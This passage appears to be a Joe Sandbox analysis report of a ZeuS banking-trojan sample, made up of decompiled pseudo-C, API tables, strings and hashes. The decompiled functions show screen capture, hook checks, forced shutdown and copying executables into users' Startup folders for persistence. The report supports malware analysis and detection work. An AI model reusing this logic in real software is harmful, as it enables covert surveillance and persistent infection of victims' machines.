				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
				_v108 = _t176;
				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
					L66:
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
					if(_v60 != 0) {
						FreeLibrary(_v60);
					}
					if(_v16 != 0) {
						FreeLibrary(_v16);
					}
					return _v32;
				} else {
					_t181 = LoadLibraryA("ole32.dll");
					_v60 = _t181;
					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
					_v120 = _t182;
					if(_t182 == 0) {
						goto L66;
					}
					_t183 = LoadLibraryA("gdi32.dll");
					_v16 = _t183;
					_t262 = GetProcAddress(_t183, "CreateDCW");
					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
					_v56 = GetProcAddress(_v16, "SelectObject");
					_v76 = GetProcAddress(_v16, "BitBlt");
					_v84 = GetProcAddress(_v16, "DeleteObject");
					_t191 = GetProcAddress(_v16, "DeleteDC");
					_v68 = _t191;
					if(_t262 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
						goto L66;
					} else {
						_push(0);
						_push( &_v104);
						_push( &_v116);
						_v104 = 1;
						_v100 = 0;
						_v96 = 0;
						_v92 = 0;
						if(_v24() != 0) {
							goto L66;
						}
						_t268 =  *_t262(L"DISPLAY", 0, 0, 0);
						_v24 = _t268;
						if(_t268 == 0) {
							L65:
							_v80(_v116);
							goto L66;
						}
						_t197 = _v12(_t268);
						_v36 = _t197;
						if(_t197 == 0) {
							L64:
							_v68(_v24);
							goto L65;
						}
						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
						_v12 = _t199;
						if(_t199 == 0) {
							L24:
							_t263 = 0;
							goto L26;
						} else {
							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
								_v12 = 0;
							}
							if(_v12 != 0) {
								_t263 = _a12;
								L26:
								if(_t263 == 0) {
									_t200 = _v28(_t268, 8);
									_t269 = _t200;
									_a12 = _v28(_v24, 0xa);
								} else {
									_t269 = _t263 & 0x0000ffff;
									_a12 = _t269;
								}
								_t202 = _v44(_v24, _t269, _a12);
								_v44 = _t202;
								if(_t202 == 0) {
									L63:
									_v68(_v36);
									goto L64;
								} else {
									_t204 = _v56(_v36, _t202);
									_v112 = _t204;
									if(_t204 == 0) {
										L62:
										_v84(_v44);
										goto L63;
									}
									_t206 = 0;
									_t248 = 0;
									if(_t263 != 0) {
										_t260 = (_t263 & 0x0000ffff) >> 1;
										_t206 =  <  ? 0 : _v52.x - _t260;
										_t248 =  <  ? 0 : _v52.y - _t260;
										_t81 =  &_v52;
										 *_t81 = _v52.x - _t206;
										if( *_t81 < 0) {
											_v52.x = 0;
										}
										_t84 =  &(_v52.y);
										 *_t84 = _v52.y - _t248;
										if( *_t84 < 0) {
											_v52.y = 0;
										}
									}
									_push(0x40cc0020);
									_push(_t248);
									_push(_t206);
									_push(_v24);
									_push(_a12);
									_push(_t269);
									_push(0);
									_push(0);
									_push(_v36);
									if(_v76() == 0) {
										L61:
										_v56(_v36, _v112);
										goto L62;
									} else {
										if(_v12 != 0) {
											_t254 =  <  ? 0 : _v52.x - _v172.xHotspot;
											_t239 = _v52.y - _v172.yHotspot;
											_t240 =  <  ? 0 : _t239;
											DrawIcon(_v36,  <  ? 0 : _v52.x - _v172.xHotspot,  <  ? 0 : _t239, _v12);
										}
										_push( &_v12);
										_push(0);
										_push(_v44);
										_v12 = 0;
										if(_v88() != 0 || _v12 == 0) {
											goto L61;
										} else {
											_push( &_v28);
											_push( &_a12);
											_a12 = 0;
											_v28 = 0;
											if(_v40() != 0) {
												L60:
												_v72(_v12);
												goto L61;
											}
											_t215 = _v28;
											if(_v28 == 0 || _a12 == 0) {
												goto L60;
											} else {
												_t264 = E004051B6(_t215);
												_v40 = _t264;
												if(_t264 == 0) {
													goto L60;
												}
												_push(_t264);
												_push(_v28);
												_push(_a12);
												if(_v64() != 0) {
													L52:
													E004051E6(_v40);
													if(_a12 == 0) {
														_push( &_v32);
														_push(1);
														_push(0);
														if(_v120() == 0 && _v32 != 0) {
															_v152 = 0;
															if(_a8 > 0) {
																E00405222( &_v148, 0x4035d4, 0x10);
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x7c)) = 4;
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x80)) = 1;
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x78)) =  &_a8;
																_v152 = _v152 + 1;
															}
															_t223 = _v108(_v12, _v32,  &_v188,  &_v152);
															_t224 = _v32;
															if(_t223 == 0) {
																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
															} else {
																 *((intOrPtr*)( *_t224 + 8))(_t224);
																_v32 = 0;
															}
														}
													}
													goto L60;
												}
												_t272 = 0;
												if(_a12 <= 0) {
													goto L52;
												}
												_t265 = _t264 + 0x30;
												while(lstrcmpiW(_a4,  *_t265) != 0) {
													_t272 = _t272 + 1;
													_t265 =  &(_t265[0x13]);
													if(_t272 < _a12) {
														continue;
													}
													goto L52;
												}
												E00405222( &_v188, _t272 * 0x4c + _v40, 0x10);
												_a12 = 0;
												goto L52;
											}
										}
									}
								}
							}
							goto L24;
						}
					}
				}
			}

0x0040e335
0x0040e338
0x0040e33b
0x0040e33e
0x0040e345
0x0040e348
0x0040e34b
0x0040e34e
0x0040e35c
0x0040e369
0x0040e376
0x0040e383
0x0040e390
0x0040e39d
0x0040e3aa
0x0040e3ad
0x0040e3af
0x0040e3b5
0x0040e799
0x0040e7a2
0x0040e7a7
0x0040e7a7
0x0040e7ac
0x0040e7b1
0x0040e7b1
0x0040e7b6
0x0040e7bb
0x0040e7bb
0x0040e7c4
0x0040e3f0
0x0040e3f5
0x0040e3fd
0x0040e400
0x0040e402
0x0040e407
0x00000000
0x00000000
0x0040e412
0x0040e41a
0x0040e427
0x0040e433
0x0040e440
0x0040e44d
0x0040e45a
0x0040e467
0x0040e474
0x0040e477
0x0040e479
0x0040e47e
0x00000000
0x0040e4c2
0x0040e4c2
0x0040e4c6
0x0040e4ca
0x0040e4cb
0x0040e4d2
0x0040e4d5
0x0040e4d8
0x0040e4e0
0x00000000
0x00000000
0x0040e4f0
0x0040e4f2
0x0040e4f7
0x0040e793
0x0040e796
0x00000000
0x0040e796
0x0040e4fe
0x0040e501
0x0040e506
0x0040e78d
0x0040e790
0x00000000
0x0040e790
0x0040e51b
0x0040e521
0x0040e526
0x0040e550
0x0040e550
0x00000000
0x0040e528
0x0040e538
0x0040e548
0x0040e548
0x0040e54e
0x0040e554
0x0040e557
0x0040e55a
0x0040e567
0x0040e56f
0x0040e574
0x0040e55c
0x0040e55c
0x0040e55f
0x0040e55f
0x0040e57e
0x0040e581
0x0040e586
0x0040e787
0x0040e78a
0x00000000
0x0040e58c
0x0040e590
0x0040e593
0x0040e598
0x0040e781
0x0040e784
0x00000000
0x0040e784
0x0040e59e
0x0040e5a0
0x0040e5a5
0x0040e5b0
0x0040e5b4
0x0040e5b9
0x0040e5bc
0x0040e5bc
0x0040e5bf
0x0040e5c1
0x0040e5c1
0x0040e5c4
0x0040e5c4
0x0040e5c7
0x0040e5c9
0x0040e5c9
0x0040e5c7
0x0040e5cc
0x0040e5d1
0x0040e5d2
0x0040e5d3
0x0040e5d6
0x0040e5d9
0x0040e5da
0x0040e5db
0x0040e5dc
0x0040e5e4
0x0040e778
0x0040e77e
0x00000000
0x0040e5ea
0x0040e5ed
0x0040e5fe
0x0040e601
0x0040e607
0x0040e60f
0x0040e60f
0x0040e618
0x0040e619
0x0040e61a
0x0040e61d
0x0040e625
0x00000000
0x0040e634
0x0040e637
0x0040e63b
0x0040e63c
0x0040e63f
0x0040e647
0x0040e772
0x0040e775
0x00000000
0x0040e775
0x0040e64d
0x0040e652
0x00000000
0x0040e661
0x0040e666
0x0040e668
0x0040e66d
0x00000000
0x00000000
0x0040e673
0x0040e674
0x0040e677
0x0040e67f
0x0040e6bd
0x0040e6c0
0x0040e6c8
0x0040e6d1
0x0040e6d5
0x0040e6d6
0x0040e6dc
0x0040e6eb
0x0040e6f4
0x0040e704
0x0040e712
0x0040e723
0x0040e733
0x0040e737
0x0040e737
0x0040e751
0x0040e756
0x0040e759
0x0040e76f
0x0040e75b
0x0040e75e
0x0040e761
0x0040e761
0x0040e759
0x0040e6dc
0x00000000
0x0040e6c8
0x0040e681
0x0040e686
0x00000000
0x00000000
0x0040e688
0x0040e68b
0x0040e69a
0x0040e69b
0x0040e6a1
0x00000000
0x00000000
0x00000000
0x0040e6a3
0x0040e6b5
0x0040e6ba
0x00000000
0x0040e6ba
0x0040e652
0x0040e625
0x0040e5e4
0x0040e586
0x00000000
0x0040e54e
0x0040e526
0x0040e47e

APIs

LoadLibraryA.KERNEL32(gdiplus.dll,?,?,?), ref: 0040E34E
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040E35F
GetProcAddress.KERNEL32(000001F4,GdiplusShutdown), ref: 0040E36C
GetProcAddress.KERNEL32(000001F4,GdipCreateBitmapFromHBITMAP), ref: 0040E379
GetProcAddress.KERNEL32(000001F4,GdipDisposeImage), ref: 0040E386
GetProcAddress.KERNEL32(000001F4,GdipGetImageEncodersSize), ref: 0040E393
GetProcAddress.KERNEL32(000001F4,GdipGetImageEncoders), ref: 0040E3A0
GetProcAddress.KERNEL32(000001F4,GdipSaveImageToStream), ref: 0040E3AD
LoadLibraryA.KERNEL32(ole32.dll,?,?,?), ref: 0040E3F5
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040E400
LoadLibraryA.KERNEL32(gdi32.dll,?,?,?), ref: 0040E412
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040E41D
GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 0040E429
GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 0040E436
GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 0040E443
GetProcAddress.KERNEL32(?,SelectObject), ref: 0040E450
GetProcAddress.KERNEL32(?,BitBlt), ref: 0040E45D
GetProcAddress.KERNEL32(?,DeleteObject), ref: 0040E46A
GetProcAddress.KERNEL32(?,DeleteDC), ref: 0040E477
LoadImageW.USER32 ref: 0040E51B
GetIconInfo.USER32(00000000,?), ref: 0040E530
GetCursorPos.USER32(?,?,?,?), ref: 0040E53E
DrawIcon.USER32 ref: 0040E60F
lstrcmpiW.KERNEL32(?,-00000030,?,?,?), ref: 0040E690
FreeLibrary.KERNEL32(000001F4,?,?,?), ref: 0040E7A7
FreeLibrary.KERNEL32(?,?,?,?), ref: 0040E7B1
FreeLibrary.KERNEL32(?,?,?,?), ref: 0040E7BB

Strings

BitBlt, xrefs: 0040E452
GetDeviceCaps, xrefs: 0040E438
CreateCompatibleBitmap, xrefs: 0040E42B
CreateCompatibleDC, xrefs: 0040E41F
GdipDisposeImage, xrefs: 0040E37B
GdiplusShutdown, xrefs: 0040E361
ole32.dll, xrefs: 0040E3F0
GdiplusStartup, xrefs: 0040E356
GdipSaveImageToStream, xrefs: 0040E3A2
CreateDCW, xrefs: 0040E414
SelectObject, xrefs: 0040E445
CreateStreamOnHGlobal, xrefs: 0040E3F7
GdipGetImageEncoders, xrefs: 0040E395
gdiplus.dll, xrefs: 0040E330
DeleteDC, xrefs: 0040E46C
GdipGetImageEncodersSize, xrefs: 0040E388
gdi32.dll, xrefs: 0040E40D
DeleteObject, xrefs: 0040E45F
GdipCreateBitmapFromHBITMAP, xrefs: 0040E36E
DISPLAY, xrefs: 0040E4E9

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
API String ID: 1554524784-1167942225
Opcode ID: 7b55a6904f82d42c59590c9482a1ecf1bc5bd0f1d046da0264f603548466c7bc
Instruction ID: 83e6845dd48db0c5ae9eba9adc6da11470be33b092abba29c1de989dde0dc0b5
Opcode Fuzzy Hash: 7b55a6904f82d42c59590c9482a1ecf1bc5bd0f1d046da0264f603548466c7bc
Instruction Fuzzy Hash: 58E1C4B1D00259ABDF209FE2CD84AAEBFB9FF04301F14483AE615B6290D7799A51CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041D16A, Relevance: 30.2, APIs: 20, Instructions: 242
synchronizationsleepshutdownCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E0041D16A(void* __ecx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t79;
				intOrPtr* _t80;
				void* _t82;
				void* _t84;
				void* _t88;
				void* _t92;
				int _t100;
				int _t108;
				void* _t113;
				intOrPtr _t130;
				void* _t145;
				void* _t147;
				void* _t152;
				void* _t154;
				void* _t170;

				_t170 = __fp0;
				_t136 = __ecx;
				_t152 = _t154 - 0x70;
				_t149 = _t152 + 0x50;
				 *(_t152 + 0x6f) = 0;
				if(E0040A402(0, __ecx, _t152 + 0x50,  *0x423a0c) != 0) {
					 *(_t152 + 0x68) =  *(_t152 + 0x54);
					_t130 = E0041CDE5(_t152 + 0x68, __ecx,  *(_t152 + 0x50));
					 *((intOrPtr*)(_t152 + 0x60)) = _t130;
					if(_t130 == 0) {
						 *(_t152 + 0x68) = 0;
					}
					E0040A4AA(_t152 + 0x50);
				}
				if( *(_t152 + 0x68) != 0x1e6) {
					__eflags =  *(_t152 + 0x68) - 0xc;
					if( *(_t152 + 0x68) != 0xc) {
						L41:
						E004051E6( *((intOrPtr*)(_t152 + 0x60)));
						return  *(_t152 + 0x6f);
					}
					_t74 = E0041C97E(_t136, 0x8889347b, 2);
					 *(_t152 + 0x5c) = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						L39:
						__eflags =  *(_t152 + 0x7c) - 1;
						if( *(_t152 + 0x7c) == 1) {
							E00406C4B(0, _t149,  *0x423a0c);
						}
						goto L41;
					}
					E0041C946(0x19367401, _t152 - 0x18, 1);
					_t79 = E004089C9(_t152 - 0x18);
					_t149 = GetFileAttributesExW;
					__eflags = _t79;
					if(_t79 == 0) {
						L23:
						_t80 =  *0x4239b4;
						__imp__IsWellKnownSid( *_t80, 0x16);
						__eflags = _t80 - 1;
						if(__eflags != 0) {
							 *(_t152 + 0x6f) = 0;
							_t82 = ReadProcessMemory(0xffffffff, _t149, _t152 + 0x6f, 1, 0);
							__eflags = _t82;
							if(_t82 == 0) {
								L29:
								_push( *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)))));
								_t84 = E0040B607(_t136, L0040C1F0,  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)) + 4)));
								_t149 = 0x423a10;
								 *(_t152 + 0x6f) = L0040C1F0(_t84, 0, 0x423a10, _t152 - 0x294, L0040C1F0, 0x423a10, _t170);
								L30:
								__eflags =  *(_t152 + 0x6f) - 1;
								if( *(_t152 + 0x6f) == 1) {
									_t88 = E00406AAD(_t152 - 0x294, 0, _t149, 0, _t152 + 0x4c);
									__eflags = _t88;
									 *(_t152 + 0x6f) = _t88 != 0;
									__eflags =  *(_t152 + 0x6f);
									if( *(_t152 + 0x6f) != 0) {
										E0041C946(0x1a43533f, _t152 - 0x18, 1);
										_t92 = CreateEventW(0x4239e8, 1, 0, _t152 - 0x18);
										_t145 =  *(_t152 + 0x4c);
										 *(_t152 + 0x64) = _t92;
										 *(_t152 + 0x68) = _t145;
										_push(0xffffffff);
										__eflags = _t92;
										if(_t92 != 0) {
											WaitForMultipleObjects(2, _t152 + 0x64, 0, ??);
										} else {
											WaitForSingleObject(_t145, ??);
										}
										_t149 = CloseHandle;
										__eflags =  *(_t152 + 0x64);
										if( *(_t152 + 0x64) != 0) {
											CloseHandle( *(_t152 + 0x64));
										}
										CloseHandle( *(_t152 + 0x50));
										CloseHandle(_t145);
									}
								}
								L38:
								E004089B9( *(_t152 + 0x5c));
								goto L39;
							}
							__eflags =  *(_t152 + 0x6f) - 0xe9;
							if( *(_t152 + 0x6f) != 0xe9) {
								goto L29;
							}
							_t100 = GetFileAttributesExW(0x423e1e, 0x78f16360, _t152 + 0x68);
							__eflags = _t100 - 1;
							if(_t100 != 1) {
								goto L29;
							}
							_push( *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)))));
							E0040B607(_t136, L0040C55C,  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)) + 8)));
							_t149 = 0x423a10;
							 *(_t152 + 0x6f) = L0040C55C(_t152 - 0x294, 0,  *(_t152 + 0x68), 0x423a10, L0040C55C, 0x423a10, _t170, _t152 - 0x294,  *((intOrPtr*)(_t152 + 0x78)));
							VirtualFree( *(_t152 + 0x68), 0, 0x8000);
							goto L30;
						}
						 *(_t152 + 0x6f) = E0040C874(__eflags);
						goto L38;
					} else {
						goto L20;
					}
					while(1) {
						L20:
						 *(_t152 + 0x6f) = 0;
						_t108 = ReadProcessMemory(0xffffffff, _t149, _t152 + 0x6f, 1, 0);
						__eflags = _t108;
						if(_t108 == 0) {
							goto L22;
						}
						__eflags =  *(_t152 + 0x6f) - 0xe9;
						if( *(_t152 + 0x6f) == 0xe9) {
							goto L23;
						}
						L22:
						Sleep(0x1f4);
					}
				}
				if(E0040C4A5( *((intOrPtr*)(_t152 + 0x60))) != 0) {
					E0041C946(0x32901130, _t152 - 0x18, 1);
					_t113 = CreateMutexW(0x4239e8, 1, _t152 - 0x18);
					 *(_t152 + 0x7c) = _t113;
					if(_t113 != 0) {
						if(GetLastError() == 0xb7) {
							CloseHandle( *(_t152 + 0x7c));
							 *(_t152 + 0x7c) = 0;
						}
						if( *(_t152 + 0x7c) != 0) {
							E0041D56B(_t136, _t152 - 0x8c);
							if(( *(_t152 - 0x8c) & 0x00000020) != 0) {
								 *0x4239b0 =  *0x4239b0 | 0x00000010;
							}
							E00404FF7();
							if(( *0x4239b0 & 0x00000010) != 0) {
								ExitWindowsEx(0x14, 0x80000000);
							}
							E0041C946(0x1a43533f, _t152 - 0x18, 1);
							_t147 = OpenEventW(2, 0, _t152 - 0x18);
							if(_t147 != 0) {
								SetEvent(_t147);
								CloseHandle(_t147);
							}
							E0041CEA2(1);
							 *(_t152 + 0x6f) = 1;
							CloseHandle( *(_t152 + 0x7c));
						}
					}
				}
				goto L41;
			}

0x0041d16a
0x0041d16a
0x0041d16b
0x0041d182
0x0041d185
0x0041d18f
0x0041d197
0x0041d19d
0x0041d1a2
0x0041d1a7
0x0041d1a9
0x0041d1a9
0x0041d1af
0x0041d1af
0x0041d1bb
0x0041d29a
0x0041d29e
0x0041d45b
0x0041d45e
0x0041d46d
0x0041d46d
0x0041d2ab
0x0041d2b0
0x0041d2b3
0x0041d2b5
0x0041d44a
0x0041d44a
0x0041d44e
0x0041d456
0x0041d456
0x00000000
0x0041d44e
0x0041d2c6
0x0041d2cf
0x0041d2d4
0x0041d2e0
0x0041d2e2
0x0041d30a
0x0041d30a
0x0041d313
0x0041d319
0x0041d31c
0x0041d335
0x0041d338
0x0041d33a
0x0041d33c
0x0041d398
0x0041d39b
0x0041d3a5
0x0041d3aa
0x0041d3bc
0x0041d3bf
0x0041d3bf
0x0041d3c3
0x0041d3d3
0x0041d3d8
0x0041d3da
0x0041d3de
0x0041d3e1
0x0041d3ee
0x0041d3ff
0x0041d405
0x0041d408
0x0041d40b
0x0041d40e
0x0041d410
0x0041d412
0x0041d424
0x0041d414
0x0041d415
0x0041d415
0x0041d42a
0x0041d430
0x0041d433
0x0041d438
0x0041d438
0x0041d43d
0x0041d440
0x0041d440
0x0041d3e1
0x0041d442
0x0041d445
0x00000000
0x0041d445
0x0041d33e
0x0041d342
0x00000000
0x00000000
0x0041d352
0x0041d354
0x0041d357
0x00000000
0x00000000
0x0041d35c
0x0041d366
0x0041d377
0x0041d38d
0x0041d390
0x00000000
0x0041d390
0x0041d323
0x00000000
0x00000000
0x00000000
0x00000000
0x0041d2e4
0x0041d2e4
0x0041d2ee
0x0041d2f1
0x0041d2f3
0x0041d2f5
0x00000000
0x00000000
0x0041d2f7
0x0041d2fb
0x00000000
0x00000000
0x0041d2fd
0x0041d302
0x0041d302
0x0041d2e4
0x0041d1cb
0x0041d1dc
0x0041d1ec
0x0041d1f2
0x0041d1f7
0x0041d20e
0x0041d213
0x0041d215
0x0041d215
0x0041d21b
0x0041d228
0x0041d234
0x0041d236
0x0041d236
0x0041d23d
0x0041d249
0x0041d252
0x0041d252
0x0041d263
0x0041d275
0x0041d279
0x0041d27c
0x0041d283
0x0041d283
0x0041d287
0x0041d28f
0x0041d293
0x0041d293
0x0041d21b
0x0041d1f7
0x00000000

APIs

Part of subcall function 0040A402: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,0041D18D,?,?,00000000), ref: 0040A427
Part of subcall function 0040A402: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0041D18D,?,?,00000000), ref: 0040A43A

CreateMutexW.KERNEL32(004239E8,00000001,?,32901130,?,00000001,?,?,?,00000000), ref: 0041D1EC
GetLastError.KERNEL32(?,?,00000000), ref: 0041D1FD
CloseHandle.KERNEL32(00000001,?,?,00000000), ref: 0041D213
ExitWindowsEx.USER32(00000014,80000000), ref: 0041D252
OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001,?,?,?,00000000), ref: 0041D26F
SetEvent.KERNEL32(00000000,?,?,00000000), ref: 0041D27C
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0041D283
CloseHandle.KERNEL32(00000001,00000001,?,?,00000000), ref: 0041D293
ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,?,00000001,00000000,?,19367401,?,00000001,8889347B,00000002,?,?,00000000), ref: 0041D2F1
Sleep.KERNEL32(000001F4,?,?,00000000), ref: 0041D302
IsWellKnownSid.ADVAPI32(?,00000016,?,19367401,?,00000001,8889347B,00000002,?,?,00000000), ref: 0041D313
ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,?,00000001,00000000,?,?,00000000), ref: 0041D338
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,00000000), ref: 0041D390
GetFileAttributesExW.KERNEL32(00423E1E,78F16360,?,?,?,00000000), ref: 0041D352

Part of subcall function 0040B607: VirtualProtect.KERNEL32(0040C1F0,?,00000040,00000000,74B5F9B0,?,?,0041D3AA,?,?,?,?,00000000), ref: 0040B61C
Part of subcall function 0040B607: VirtualProtect.KERNEL32(0040C1F0,?,00000000,00000000,?,?,0041D3AA,?,?,?,?,00000000), ref: 0040B64F

CreateEventW.KERNEL32(004239E8,00000001,00000000,?,1A43533F,?,00000001,?,?,00000000,00423A10,00000000,?,?,?), ref: 0041D3FF
WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000), ref: 0041D415
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000), ref: 0041D424
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0041D438
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0041D43D
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0041D440

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CloseHandle$CreateEventFileVirtual$MemoryProcessProtectReadWait$AttributesErrorExitFreeKnownLastMultipleMutexObjectObjectsOpenSingleSizeSleepWellWindows
String ID:
API String ID: 561470431-0
Opcode ID: 2e3ff7733021d977ab97b21b44bc3d7f26e8afcfeb765c59b8092d575d1be04f
Instruction ID: c7c2245eccef5e61c37e49668e25028ee63083f6671e90c2d451ae78b2e6f36f
Opcode Fuzzy Hash: 2e3ff7733021d977ab97b21b44bc3d7f26e8afcfeb765c59b8092d575d1be04f
Instruction Fuzzy Hash: 7991A1B1900258EFDF10EF61CD85EEE3FA9AF05314F00416AFD15A22A1C779D885CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040C874, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E0040C874(void* __eflags) {
				char _v5;
				char* _v12;
				char _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				char _v88;
				char _v608;
				short _v1128;
				char _v1648;
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t63;
				int _t69;
				char _t70;
				char _t76;
				int _t80;
				char _t81;
				char _t82;
				char _t86;
				char _t88;
				WCHAR* _t98;
				int _t99;
				CHAR* _t110;
				char* _t111;
				WCHAR* _t112;
				struct HINSTANCE__* _t113;
				signed int _t114;
				void* _t115;

				_t112 =  &_v56;
				_v5 = 0;
				E0040F34A(0xe1, _t112);
				_t113 = LoadLibraryW(_t112);
				if(_t113 == 0) {
					L7:
					return 0;
				} else {
					_t110 =  &_v88;
					E0040F314(0xe2, _t110);
					_t63 = GetProcAddress(_t113, _t110);
					if(_t63 != 0) {
						_push( &_v12);
						_t106 =  &_v608;
						_push( &_v608);
						_v12 = 0x104;
						if( *_t63() == 1) {
							_t98 =  &_v1128;
							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
							if(_t98 == 0) {
								_t106 =  &_v608;
								_t99 = E00405D35(_t106);
								_v12 = _t99;
								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
									_t106 = _t115 + _v12 * 2 - 0x464;
									E00405587(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
									_v5 = 1;
								}
							}
						}
					}
					FreeLibrary(_t113);
					if(_v5 != 0) {
						_v5 = 0;
						_v28 = 0;
						_t111 = L".exe";
						do {
							_v12 = 0;
							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
							_v24 = _t69;
							__eflags = _t69;
							if(_t69 == 0) {
								L11:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L24;
								}
								_t114 = 0;
								__eflags = _v20;
								if(_v20 <= 0) {
									L23:
									NetApiBufferFree(_v12);
									goto L24;
								} else {
									goto L13;
								}
								do {
									L13:
									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
									__eflags = _t80;
									if(_t80 == 0) {
										_t81 = _v16;
										__eflags = _t81;
										if(_t81 != 0) {
											_t106 =  &_v608;
											_t82 = E0041C086( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
											__eflags = _t82;
											if(_t82 != 0) {
												_t86 = E0040AA77( &_v1128,  &_v608,  &_v608);
												__eflags = _t86;
												if(_t86 != 0) {
													_t88 = E0040A7F9( &_v608);
													__eflags = _t88;
													if(_t88 != 0) {
														__eflags = E00409696(0,  &_v608,  &_v1648, _t111, 6);
														if(__eflags != 0) {
															__eflags = E0040BFBB( &_v608, __eflags, 0,  &_v1648, 0);
															if(__eflags != 0) {
																_v5 = 1;
																E0040C0E8( &_v608, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
															}
														}
													}
												}
											}
											NetApiBufferFree(_v16);
										}
									}
									_t114 = _t114 + 1;
									__eflags = _t114 - _v20;
								} while (_t114 < _v20);
								goto L23;
							}
							__eflags = _t69 - 0xea;
							if(_t69 != 0xea) {
								break;
							}
							goto L11;
							L24:
							__eflags = _v24 - 0xea;
						} while (_v24 == 0xea);
						_t70 =  &_v1128;
						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
						__eflags = _t70;
						if(_t70 == 0) {
							__eflags = E00409696(0,  &_v1128,  &_v1648, _t111, 6);
							if(__eflags != 0) {
								_t76 = E0040BFBB(_t106, __eflags, 0,  &_v1648, 0);
								__eflags = _t76;
								if(_t76 != 0) {
									_v5 = 1;
								}
							}
						}
						return _v5;
					}
					goto L7;
				}
			}

0x0040c882
0x0040c88a
0x0040c88d
0x0040c89b
0x0040c89f
0x0040c93c
0x00000000
0x0040c8a5
0x0040c8a5
0x0040c8ad
0x0040c8b6
0x0040c8be
0x0040c8c3
0x0040c8c4
0x0040c8ca
0x0040c8cb
